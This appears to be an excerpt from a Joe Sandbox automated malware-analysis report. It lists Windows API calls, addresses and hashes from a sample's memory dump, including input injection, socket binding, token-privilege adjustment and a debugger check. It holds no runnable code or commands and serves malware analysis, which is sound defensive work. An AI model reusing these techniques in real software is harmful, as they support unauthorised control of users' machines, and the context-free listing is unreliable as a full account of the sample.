                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                        • String ID: \*.*
                                                                                                                                        • API String ID: 2649000838-1173974218
                                                                                                                                        • Opcode ID: 321ebf453847755a2b7108c6ccba4a5a1d8482120f0603f5a663565e784fc8fc
                                                                                                                                        • Instruction ID: 4c0e551da074e4e21a75634fba70d1b19d6609d1e2d9a22dd09b5f5e429b96bf
                                                                                                                                        • Opcode Fuzzy Hash: 321ebf453847755a2b7108c6ccba4a5a1d8482120f0603f5a663565e784fc8fc
                                                                                                                                        • Instruction Fuzzy Hash: 3E316F310183559FC204FF64D8918AF77E8BE95710F484E9EF4D9531A1EB30AA09CB62
                                                                                                                                        APIs
                                                                                                                                        • _wcslen.LIBCMT ref: 00B964DC
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00B96639
                                                                                                                                        • CoCreateInstance.OLE32(00BBFCF8,00000000,00000001,00BBFB68,?), ref: 00B96650
                                                                                                                                        • CoUninitialize.OLE32 ref: 00B968D4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                        • String ID: .lnk
                                                                                                                                        • API String ID: 886957087-24824748
                                                                                                                                        • Opcode ID: 531a34edeed7a90b468c29bb7579d3ed1f825592f1e60897a5a505c8e0a99c9d
                                                                                                                                        • Instruction ID: 67b798a2b7b38fa6bd57985672204b34f5ec4e8f7af4e5ec5468faa114696778
                                                                                                                                        • Opcode Fuzzy Hash: 531a34edeed7a90b468c29bb7579d3ed1f825592f1e60897a5a505c8e0a99c9d
                                                                                                                                        • Instruction Fuzzy Hash: 73D15C71508215AFC704EF24D891D6BB7E9FF98704F0049ADF5998B2A1DB70ED09CBA2
                                                                                                                                        APIs
                                                                                                                                        • GetForegroundWindow.USER32(?,?,00000000), ref: 00BA22E8
                                                                                                                                          • Part of subcall function 00B9E4EC: GetWindowRect.USER32(?,?), ref: 00B9E504
                                                                                                                                        • GetDesktopWindow.USER32 ref: 00BA2312
                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00BA2319
                                                                                                                                        • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00BA2355
                                                                                                                                        • GetCursorPos.USER32(?), ref: 00BA2381
                                                                                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00BA23DF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2387181109-0
                                                                                                                                        • Opcode ID: 103f578ff4b33d422e3adfb41556d9a6fa4604ac5550863ba1fbc09613d81b67
                                                                                                                                        • Instruction ID: 145becf000af9f2ce56e784563008f08ec071a5b4c72689c91c9e5543b055c3a
                                                                                                                                        • Opcode Fuzzy Hash: 103f578ff4b33d422e3adfb41556d9a6fa4604ac5550863ba1fbc09613d81b67
                                                                                                                                        • Instruction Fuzzy Hash: 4731E272508315AFCB20DF18D845F5BBBE9FF86310F000A59F99597191DB74EA08CB96
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B29CB3: _wcslen.LIBCMT ref: 00B29CBD
                                                                                                                                        • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00B99B78
                                                                                                                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00B99C8B
                                                                                                                                          • Part of subcall function 00B93874: GetInputState.USER32 ref: 00B938CB
                                                                                                                                          • Part of subcall function 00B93874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B93966
                                                                                                                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00B99BA8
                                                                                                                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00B99C75
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                        • String ID: *.*
                                                                                                                                        • API String ID: 1972594611-438819550
                                                                                                                                        • Opcode ID: 074d105939c1b8bd457c1d16ad3b9b8c4462fa1cc8adce6bf7841fa0486660fc
                                                                                                                                        • Instruction ID: 6ab50fd2982d59f8b15f234bdaa1e319943002bc00e960f7450f3afa4ab5041b
                                                                                                                                        • Opcode Fuzzy Hash: 074d105939c1b8bd457c1d16ad3b9b8c4462fa1cc8adce6bf7841fa0486660fc
                                                                                                                                        • Instruction Fuzzy Hash: 4F41827190060AAFCF54DF68DC85AEEBBF8EF05310F2441AAE409A3191EB709E44CF60
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00B39BB2
                                                                                                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00B39A4E
                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00B39B23
                                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00B39B36
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Color$LongProcWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3131106179-0
                                                                                                                                        • Opcode ID: 6a3134b8550a89107dc9508b50f81002abd3ce4ff65d96019da0708c041e52d5
                                                                                                                                        • Instruction ID: 2e36dc3d6b73a9ac6cf75619cc4cac21bc4f9460d4d56f50ec5f24e055a34baa
                                                                                                                                        • Opcode Fuzzy Hash: 6a3134b8550a89107dc9508b50f81002abd3ce4ff65d96019da0708c041e52d5
                                                                                                                                        • Instruction Fuzzy Hash: 59A10371248404EFE728AA2D8C99EBB3ADDDB42340F3587C9F122D7695CEA5DD01C272
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00BA304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00BA307A
                                                                                                                                          • Part of subcall function 00BA304E: _wcslen.LIBCMT ref: 00BA309B
                                                                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00BA185D
                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 00BA1884
                                                                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00BA18DB
                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 00BA18E6
                                                                                                                                        • closesocket.WSOCK32(00000000), ref: 00BA1915
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1601658205-0
                                                                                                                                        • Opcode ID: 08c615378af04afa33d5e0f3975aaea01a03a26c4371466440cd98c74dd22991
                                                                                                                                        • Instruction ID: b7909708365ffe09b1d073135872cf6b16223276e17fe6dd74fa7a2adb05154d
                                                                                                                                        • Opcode Fuzzy Hash: 08c615378af04afa33d5e0f3975aaea01a03a26c4371466440cd98c74dd22991
                                                                                                                                        • Instruction Fuzzy Hash: 2251B171A00210AFDB10EF24D896F6A7BE5EF49718F148498F9096F383CB75AD418BA1
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 292994002-0
                                                                                                                                        • Opcode ID: a3b9893b494ce4ac21e10447085ab187583436600615374f03a038be69095e86
                                                                                                                                        • Instruction ID: e0488cb0408b853640c7af4a38c74a9c3560fe52aa909dff5e197b89d96c0bb1
                                                                                                                                        • Opcode Fuzzy Hash: a3b9893b494ce4ac21e10447085ab187583436600615374f03a038be69095e86
                                                                                                                                        • Instruction Fuzzy Hash: 002191317402115FD7208F1ED8A4BBA7FE5EF95314B5984A8E84ACB351CBB1ED42CB90
                                                                                                                                        APIs
                                                                                                                                        • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00B8AAAC
                                                                                                                                        • SetKeyboardState.USER32(00000080), ref: 00B8AAC8
                                                                                                                                        • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00B8AB36
                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00B8AB88
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 432972143-0
                                                                                                                                        • Opcode ID: 241cf957108e22e64ac6f8f21a157ce8d70560e6db44ffd76154f677bd5ba310
                                                                                                                                        • Instruction ID: 1cfc0ac1b256fdf74183ac3fc12fa4681c7921940844f7c6a645dff65e0b7896
                                                                                                                                        • Opcode Fuzzy Hash: 241cf957108e22e64ac6f8f21a157ce8d70560e6db44ffd76154f677bd5ba310
                                                                                                                                        • Instruction Fuzzy Hash: 9131F430A40248AFFF35EA64CC45BFA7BE6EB44320F08429BF581965F1D7B58985C762
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 00B5BB7F
                                                                                                                                          • Part of subcall function 00B529C8: HeapFree.KERNEL32(00000000,00000000,?,00B5D7D1,00000000,00000000,00000000,00000000,?,00B5D7F8,00000000,00000007,00000000,?,00B5DBF5,00000000), ref: 00B529DE
                                                                                                                                          • Part of subcall function 00B529C8: GetLastError.KERNEL32(00000000,?,00B5D7D1,00000000,00000000,00000000,00000000,?,00B5D7F8,00000000,00000007,00000000,?,00B5DBF5,00000000,00000000), ref: 00B529F0
                                                                                                                                        • GetTimeZoneInformation.KERNEL32 ref: 00B5BB91
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,?,00BF121C,000000FF,?,0000003F,?,?), ref: 00B5BC09
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,?,00BF1270,000000FF,?,0000003F,?,?,?,00BF121C,000000FF,?,0000003F,?,?), ref: 00B5BC36
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 806657224-0
                                                                                                                                        • Opcode ID: 05a1a6d9ecd590cbefd2bcedd3f1900225056b43aa74cf8afd9df2bc5b7fceb2
                                                                                                                                        • Instruction ID: 8eb74447601060a4b56681a8e89278d5d060423f4d46ab4bc32d7a2a98242883
                                                                                                                                        • Opcode Fuzzy Hash: 05a1a6d9ecd590cbefd2bcedd3f1900225056b43aa74cf8afd9df2bc5b7fceb2
                                                                                                                                        • Instruction Fuzzy Hash: 23319C71904205DFCB15DFAD9C80E79BBF8FF463117144AEAE860E72A1DB709908CB54
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00B95CC1
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00B95D17
                                                                                                                                        • FindClose.KERNEL32(?), ref: 00B95D5F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3541575487-0
                                                                                                                                        • Opcode ID: d557f3cf928ab3c4681cc19abfc1b4deccaa038dc8a96d54d4eb70822ed0ba6d
                                                                                                                                        • Instruction ID: aef65df147c1709c65de8eff1fff73564daeca332929a47b9ed01bcb8f13bb8d
                                                                                                                                        • Opcode Fuzzy Hash: d557f3cf928ab3c4681cc19abfc1b4deccaa038dc8a96d54d4eb70822ed0ba6d
                                                                                                                                        • Instruction Fuzzy Hash: 31518D746046019FCB25DF28D494E9ABBE4FF49314F1485ADE95A8B3A2CB30ED44CB91
                                                                                                                                        APIs
                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00B5271A
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B52724
                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00B52731
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                        • Opcode ID: 394cf28a76a4cac85ce468dcfd11f676e0cd83530bc7a32cca06ffd781a6befe
                                                                                                                                        • Instruction ID: 7e26614a8c0b0db33cfe03ed89e00ae243fa11512b0494eea1772330d4755477
                                                                                                                                        • Opcode Fuzzy Hash: 394cf28a76a4cac85ce468dcfd11f676e0cd83530bc7a32cca06ffd781a6befe
                                                                                                                                        • Instruction Fuzzy Hash: D731B7759112189BCB21DF64DC8979DBBF8EF08310F5041EAE81CA7261EB709F859F45
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00B951DA
                                                                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00B95238
                                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00B952A1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1682464887-0
                                                                                                                                        • Opcode ID: c2bf7e4574dc48f28c3f09996bfd39060157086e8fee3f2ec2e616d60a9c64f3
                                                                                                                                        • Instruction ID: 29d3d6aff6559538fc7f91906c3c0822067f647b8bbd3744e364db84b81ff020
                                                                                                                                        • Opcode Fuzzy Hash: c2bf7e4574dc48f28c3f09996bfd39060157086e8fee3f2ec2e616d60a9c64f3
                                                                                                                                        • Instruction Fuzzy Hash: 65313E75A00518DFDB00DF54D894EADBBF4FF49314F0880A9E809AB3A2DB71E855CB91
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B3FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00B40668
                                                                                                                                          • Part of subcall function 00B3FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00B40685
                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B8170D
                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B8173A
                                                                                                                                        • GetLastError.KERNEL32 ref: 00B8174A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 577356006-0
                                                                                                                                        • Opcode ID: 2ddd31897332ae326e25b1ca5aec6b6a200274e2d29197ebf9c717f7b547f228
                                                                                                                                        • Instruction ID: f247bf0d1bf7e21509c4f1e7ac3653c795d538e53f44c1cd1de34facd00b1c52
                                                                                                                                        • Opcode Fuzzy Hash: 2ddd31897332ae326e25b1ca5aec6b6a200274e2d29197ebf9c717f7b547f228
                                                                                                                                        • Instruction Fuzzy Hash: 6C118CB2904205AFD718AF58DC8AD6ABBFDEB44714B20856EF05657251EB70BC42CB24
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B8D608
                                                                                                                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00B8D645
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B8D650
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 33631002-0
                                                                                                                                        • Opcode ID: e95e6d8b37aa3b6e863b5d6a9f247cd8b983ffe6867094c36c71c0cc44391f68
                                                                                                                                        • Instruction ID: 502c5f747e956470dd4cfd0260eb6d841e52439e36b910b22a27fcbc3b811db8
                                                                                                                                        • Opcode Fuzzy Hash: e95e6d8b37aa3b6e863b5d6a9f247cd8b983ffe6867094c36c71c0cc44391f68
                                                                                                                                        • Instruction Fuzzy Hash: 1A113C75E05228BBDB109F99EC45FAFBFBCEB45B50F108166F904E7290D6B04A058BA1
                                                                                                                                        APIs
                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00B8168C
                                                                                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00B816A1
                                                                                                                                        • FreeSid.ADVAPI32(?), ref: 00B816B1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3429775523-0
